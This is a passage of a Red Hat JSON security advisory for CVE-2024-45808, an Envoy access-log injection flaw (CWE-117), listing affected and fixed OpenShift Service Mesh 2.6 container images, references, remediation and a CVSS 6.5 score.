"cwe": {
"id": "CWE-117",
"name": "Improper Output Neutralization for Logs"
},
"discovery_date": "2024-09-20T00:40:26.266584+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313685"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in envoy. Affected versions of envoy may allow malicious attackers to inject unexpected content into access logs. This is achieved by exploiting the lack of validation for the `REQUESTED_SERVER_NAME` field for access loggers.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Malicious log injection via access logs",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability in Envoy that allows attackers to inject unexpected content into access logs is classified as moderate severity rather than important because the impact is primarily related to log integrity rather than direct exploitation of the system or data breaches, which lowers the overall risk profile. While log tampering can lead to misleading information, it does not directly compromise the application\u2019s functionality or security boundaries. Additionally, the attack requires specific conditions to succeed, relying on the lack of validation for the `REQUESTED_SERVER_NAME` field, which may not be present in all configurations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45808"
},
{
"category": "external",
"summary": "RHBZ#2313685",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313685"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45808",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45808"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45808",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45808"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc"
}
],
"release_date": "2024-09-20T00:15:02.733000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
